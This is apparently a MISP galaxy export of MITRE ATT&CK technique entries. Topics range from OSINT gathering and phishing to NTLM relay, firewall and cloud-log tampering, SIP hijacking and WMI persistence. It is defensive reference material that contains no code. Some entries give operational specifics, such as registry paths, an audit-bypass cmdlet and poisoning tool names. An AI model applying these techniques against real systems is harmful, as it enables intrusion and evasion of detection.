An adversary could use access to a compromised device's credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications. This technique likely requires privileged access (a rooted or jailbroken device).
Internal MISP references
UUID 76c12fc8-a4eb-45d6-a3b7-e371a7248f69
which can be used as unique global reference for Manipulate App Store Rankings or Ratings - T1452
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1452 |
kill_chain | ['mobile-attack-Android:impact', 'mobile-attack-iOS:impact'] |
mitre_platforms | ['Android', 'iOS'] |
Related clusters
To see the related clusters, click here.
Acquire OSINT data sets and information - T1247
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line, such as from search engines, as well as in the physical world. (Citation: RSA-APTRecon)
Internal MISP references
UUID 784ff1bc-1483-41fe-a172-4cd9ae25c06b
which can be used as unique global reference for Acquire OSINT data sets and information - T1247
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1247 |
kill_chain | ['pre-attack:technical-information-gathering'] |
Related clusters
To see the related clusters, click here.
Acquire OSINT data sets and information - T1266
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Open source intelligence (OSINT) provides free, readily available information about a target while providing the target no indication they are of interest. Such information can assist an adversary in crafting a successful approach for compromise. (Citation: RSA-APTRecon)
Internal MISP references
UUID 2b9a666e-bd59-4f67-9031-ed41b428e04a
which can be used as unique global reference for Acquire OSINT data sets and information - T1266
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1266 |
kill_chain | ['pre-attack:people-information-gathering'] |
Related clusters
To see the related clusters, click here.
Acquire OSINT data sets and information - T1277
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Data sets can be anything from Security Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)
Internal MISP references
UUID 028ad431-84c5-4eb7-a364-2b797c234f88
which can be used as unique global reference for Acquire OSINT data sets and information - T1277
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1277 |
kill_chain | ['pre-attack:organizational-information-gathering'] |
Related clusters
To see the related clusters, click here.
Assess opportunities created by business deals - T1299
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
During mergers, divestitures, or other period of change in joint infrastructure or business processes there may be an opportunity for exploitation. During this type of churn, unusual requests, or other non standard practices may not be as noticeable. (Citation: RossiMergers) (Citation: MeidlHealthMergers)
Internal MISP references
UUID e2aa077d-60c9-4de5-b015-a9c382877cd9
which can be used as unique global reference for Assess opportunities created by business deals - T1299
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1299 |
kill_chain | ['pre-attack:organizational-weakness-identification'] |
SSL certificate acquisition for trust breaking - T1338
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Fake certificates can be acquired by legal process or coercion. Or, an adversary can trick a Certificate Authority into issuing a certificate. These fake certificates can be used as a part of Man-in-the-Middle attacks. (Citation: SubvertSSL)
Internal MISP references
UUID 54a42187-a20c-4e4e-ba31-8d15c9e1f57f
which can be used as unique global reference for SSL certificate acquisition for trust breaking - T1338
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1338 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
Identify resources required to build capabilities - T1348
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
As with legitimate development efforts, different skill sets may be required for different phases of an attack. The skills needed may be located in house, can be developed, or may need to be contracted out. (Citation: APT1)
Internal MISP references
UUID c9fb4451-729d-4771-b205-52c1829f949c
which can be used as unique global reference for Identify resources required to build capabilities - T1348
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1348 |
kill_chain | ['pre-attack:build-capabilities'] |
Hardware or software supply chain implant - T1365
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
During production and distribution, the placement of software, firmware, or a CPU chip in a computer, handheld, or other electronic device that enables an adversary to gain illegal entrance. (Citation: McDRecall) (Citation: SeagateMaxtor)
Internal MISP references
UUID 388f3a5c-2cdd-466c-9159-b507fa429fcd
which can be used as unique global reference for Hardware or software supply chain implant - T1365
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1365 |
kill_chain | ['pre-attack:stage-capabilities'] |
Test malware in various execution environments - T1357
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Malware may perform differently on different platforms (computer vs handheld) and different operating systems (Ubuntu vs OS X), and versions (Windows 7 vs 10) so malicious actors will test their malware in the environment(s) where they most expect it to be executed. (Citation: BypassMalwareDefense)
Internal MISP references
UUID e042a41b-5ecf-4f3a-8f1f-1b528c534772
which can be used as unique global reference for Test malware in various execution environments - T1357
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1357 |
kill_chain | ['pre-attack:test-capabilities'] |
Conduct social engineering or HUMINT operation - T1376
This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.
Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. Human Intelligence (HUMINT) is intelligence collected and provided by human sources. (Citation: 17millionScam) (Citation: UbiquityEmailScam)
Internal MISP references
UUID b79a1960-d0be-4b51-bb62-b27e91e1dea0
which can be used as unique global reference for Conduct social engineering or HUMINT operation - T1376
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1376 |
kill_chain | ['pre-attack:launch'] |
Spear phishing messages with malicious attachments - T1367
This technique has been deprecated. Please use Spearphishing Attachment.
Emails with malicious attachments are designed to get a user to open/execute the attachment in order to deliver malware payloads. (Citation: APT1)
Internal MISP references
UUID e24a9f99-cb76-42a3-a50b-464668773e97
which can be used as unique global reference for Spear phishing messages with malicious attachments - T1367
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1367 |
kill_chain | ['pre-attack:launch'] |
Authorized user performs requested cyber action - T1386
This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.
Clicking on links in email, opening attachments, or visiting websites that result in drive by downloads can all result in compromise due to users performing actions of a cyber nature. (Citation: AnonHBGary)
Internal MISP references
UUID 0440f60f-9056-4791-a740-8eae96eb61fa
which can be used as unique global reference for Authorized user performs requested cyber action - T1386
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1386 |
kill_chain | ['pre-attack:compromise'] |
Spear phishing messages with text only - T1368
This technique has been deprecated. Please use Phishing where appropriate.
Emails with text only phishing messages do not contain any attachments or links to websites. They are designed to get a user to take a follow on action such as calling a phone number or wiring money. They can also be used to elicit an email response to confirm existence of an account or user. (Citation: Paypal Phone Scam)
Internal MISP references
UUID 2fc04aa5-48c1-49ec-919a-b88241ef1d17
which can be used as unique global reference for Spear phishing messages with text only - T1368
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1368 |
kill_chain | ['pre-attack:launch'] |
Spear phishing messages with malicious links - T1369
This technique has been deprecated. Please use Spearphishing Link.
Emails with malicious links are designed to get a user to click on the link in order to deliver malware payloads. (Citation: GoogleDrive Phishing) (Citation: RSASEThreat)
Internal MISP references
UUID 489a7797-01c3-4706-8cd1-ec56a9db3adc
which can be used as unique global reference for Spear phishing messages with malicious links - T1369
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1369 |
kill_chain | ['pre-attack:launch'] |
Unauthorized user introduces compromise delivery mechanism - T1387
This technique has been deprecated. Please use Hardware Additions where appropriate.
If an adversary can gain physical access to the target's environment they can introduce a variety of devices that provide compromise mechanisms. This could include installing keyboard loggers, adding routing/wireless equipment, or connecting computing devices. (Citation: Credit Card Skimmers)
Internal MISP references
UUID b3253d9e-ba11-430f-b5a3-4db844ce5413
which can be used as unique global reference for Unauthorized user introduces compromise delivery mechanism - T1387
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1387 |
kill_chain | ['pre-attack:compromise'] |
Deliver Malicious App via Other Means - T1476
Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.
Delivery methods for the malicious application include:
- Spearphishing Attachment - Including the mobile app package as an attachment to an email message.
- Spearphishing Link - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.
- Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird)
Some Android malware comes with functionality to install additional applications, either automatically or when the adversary instructs it to.(Citation: android-trojan-steals-paypal-2fa)
Internal MISP references
UUID 53263a67-075e-48fa-974b-91c5b5445db7
which can be used as unique global reference for Deliver Malicious App via Other Means - T1476
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1476 - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/flappy-bird-and-third-party-app-stores/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/user-beware-rooting-malware-found-in-3rd-party-app-stores/ - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html - webarchive
- https://www.ibtimes.co.uk/danger-lurks-third-party-android-app-stores-1544861 - webarchive
- https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1476 |
kill_chain | ['mobile-attack-Android:initial-access', 'mobile-attack-iOS:initial-access'] |
mitre_platforms | ['Android', 'iOS'] |
Upload, install, and configure software/tools - T1362
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
An adversary may stage software and tools for use during later stages of an attack. The software and tools may be placed on systems legitimately in use by the adversary or may be placed on previously compromised infrastructure. (Citation: APT1) (Citation: RedOctober)
Internal MISP references
UUID e8471f43-2742-4fd7-9af7-8ed1330ada37
which can be used as unique global reference for Upload, install, and configure software/tools - T1362
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1362 |
kill_chain | ['pre-attack:stage-capabilities'] |
LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001
By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)
Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through Network Sniffing and crack the hashes offline through Brute Force to obtain the plaintext passwords.
In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response.
Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder.(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)
Internal MISP references
UUID 650c784b-7504-4df7-ab2c-4ea882384d1e
which can be used as unique global reference for LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1557/001 - webarchive
- https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html - webarchive
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html - webarchive
- https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution - webarchive
- https://github.com/Kevin-Robertson/Conveigh - webarchive
- https://github.com/SpiderLabs/Responder - webarchive
- https://github.com/nomex/nbnspoof - webarchive
- https://technet.microsoft.com/library/cc958811.aspx - webarchive
- https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response - webarchive
- https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1557.001 |
kill_chain | ['attack-Windows:credential-access', 'attack-Windows:collection'] |
mitre_data_sources | ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Windows Registry: Windows Registry Key Modification'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)
Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.
Internal MISP references
UUID fb8d023d-45be-47e9-bc51-f56bcae6435b
which can be used as unique global reference for Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1048.003 |
kill_chain | ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration', 'attack-Network:exfiltration'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] |
mitre_platforms | ['Linux', 'macOS', 'Windows', 'Network'] |
Related clusters
To see the related clusters, click here.
Exfiltration Over Unencrypted Non-C2 Protocol - T1639.001
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). Adversaries may employ custom or publicly available encoding/compression algorithms (such as base64) or embed data within protocol headers and fields.
Internal MISP references
UUID 37047267-3e56-453c-833e-d92b68118120
which can be used as unique global reference for Exfiltration Over Unencrypted Non-C2 Protocol - T1639.001
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1639.001 |
kill_chain | ['mobile-attack-Android:exfiltration', 'mobile-attack-iOS:exfiltration'] |
mitre_platforms | ['Android', 'iOS'] |
Related clusters
To see the related clusters, click here.
Match Legitimate Name or Location - T1036.005
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic.
Internal MISP references
UUID 1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2
which can be used as unique global reference for Match Legitimate Name or Location - T1036.005
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1036.005 |
kill_chain | ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Windows:defense-evasion', 'attack-Containers:defense-evasion'] |
mitre_data_sources | ['File: File Metadata', 'Image: Image Metadata', 'Process: Process Creation', 'Process: Process Metadata'] |
mitre_platforms | ['Linux', 'macOS', 'Windows', 'Containers'] |
Related clusters
To see the related clusters, click here.
Match Legitimate Name or Location - T1655.001
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by giving artifacts the name and icon of a legitimate, trusted application (i.e., Settings), or using a package name that matches legitimate, trusted applications (i.e., com.google.android.gm
).
Adversaries may also use the same icon of the file or application they are trying to mimic.
Internal MISP references
UUID 114fed8b-7eed-4136-8b9c-411c5c7fff4b
which can be used as unique global reference for Match Legitimate Name or Location - T1655.001
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1655.001 |
kill_chain | ['mobile-attack-Android:defense-evasion', 'mobile-attack-iOS:defense-evasion'] |
mitre_platforms | ['Android', 'iOS'] |
Related clusters
To see the related clusters, click here.
Disable or Modify System Firewall - T1562.004
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. Non-Standard Port).(Citation: change_rdp_port_conti)
Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various Remote Services may also indirectly modify firewall rules.
Internal MISP references
UUID 5372c5fe-f424-4def-bcd5-d3a8e770f07b
which can be used as unique global reference for Disable or Modify System Firewall - T1562.004
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1562.004 |
kill_chain | ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Windows:defense-evasion', 'attack-Network:defense-evasion'] |
mitre_data_sources | ['Command: Command Execution', 'Firewall: Firewall Disable', 'Firewall: Firewall Rule Modification', 'Windows Registry: Windows Registry Key Modification'] |
mitre_platforms | ['Linux', 'macOS', 'Windows', 'Network'] |
Related clusters
To see the related clusters, click here.
Disable or Modify Cloud Firewall - T1562.007
Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in Disable or Modify System Firewall.
Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.
Internal MISP references
UUID 77532a55-c283-4cd2-bc5d-2d0b65e9d88c
which can be used as unique global reference for Disable or Modify Cloud Firewall - T1562.007
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1562.007 |
kill_chain | ['attack-IaaS:defense-evasion'] |
mitre_data_sources | ['Firewall: Firewall Disable', 'Firewall: Firewall Rule Modification'] |
mitre_platforms | ['IaaS'] |
Related clusters
To see the related clusters, click here.
Disable or Modify Cloud Logs - T1562.008
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the Set-MailboxAuditBypassAssociation
cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)
Internal MISP references
UUID cacc40da-4c9e-462c-80d5-fd70a178b12d
which can be used as unique global reference for Disable or Modify Cloud Logs - T1562.008
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1562/008 - webarchive
- https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html - webarchive
- https://cloud.google.com/logging/docs/audit/configure-data-access - webarchive
- https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html - webarchive
- https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete - webarchive
- https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/ - webarchive
- https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py - webarchive
- https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1562.008 |
kill_chain | ['attack-IaaS:defense-evasion', 'attack-SaaS:defense-evasion', 'attack-Google-Workspace:defense-evasion', 'attack-Azure-AD:defense-evasion', 'attack-Office-365:defense-evasion'] |
mitre_data_sources | ['Cloud Service: Cloud Service Disable', 'Cloud Service: Cloud Service Modification', 'User Account: User Account Modification'] |
mitre_platforms | ['IaaS', 'SaaS', 'Google Workspace', 'Azure AD', 'Office 365'] |
Related clusters
To see the related clusters, click here.
SIP and Trust Provider Hijacking - T1553.003
Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
- Modifying the
Dll
andFuncName
Registry values inHKLM\SOFTWARE[\WOW6432Node]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg{SIP_GUID}
that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file). - Modifying the
Dll
andFuncName
Registry values inHKLM\SOFTWARE[WOW6432Node]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData{SIP_GUID}
that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk. - Modifying the
DLL
andFunction
Registry values inHKLM\SOFTWARE[WOW6432Node]Microsoft\Cryptography\Providers\Trust\FinalPolicy{trust provider GUID}
that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex). - Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
Internal MISP references
UUID 543fceb5-cb92-40cb-aacf-6913d4db58bc
which can be used as unique global reference for SIP and Trust Provider Hijacking - T1553.003
in MISP communities and other software using the MISP galaxy
External references
- http://www.entrust.net/knowledge-base/technote.cfm?tn=8165 - webarchive
- https://attack.mitre.org/techniques/T1553/003 - webarchive
- https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/ - webarchive
- https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10) - webarchive
- https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11) - webarchive
- https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files - webarchive
- https://github.com/mattifestation/PoCSubjectInterfacePackage - webarchive
- https://msdn.microsoft.com/library/ms537359.aspx - webarchive
- https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx - webarchive
- https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1553.003 |
kill_chain | ['attack-Windows:defense-evasion'] |
mitre_data_sources | ['File: File Modification', 'Module: Module Load', 'Windows Registry: Windows Registry Key Modification'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Windows Management Instrumentation Event Subscription - T1546.003
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015)
Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts – using mofcomp.exe
–into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
Internal MISP references
UUID 910906dd-8c0a-475a-9cc1-5e029e2fad58
which can be used as unique global reference for Windows Management Instrumentation Event Subscription - T1546.003
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1546/003 - webarchive
- https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1 - webarchive
- https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof- - webarchive
- https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 - webarchive
- https://technet.microsoft.com/en-us/sysinternals/bb963902 - webarchive
- https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf - webarchive
- https://www.secureworks.com/blog/wmi-persistence - webarchive
- https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1546.003 |
kill_chain | ['attack-Windows:privilege-escalation', 'attack-Windows:persistence'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Creation', 'Process: Process Creation', 'WMI: WMI Creation'] |
mitre_platforms | ['Windows'] |
Related clusters
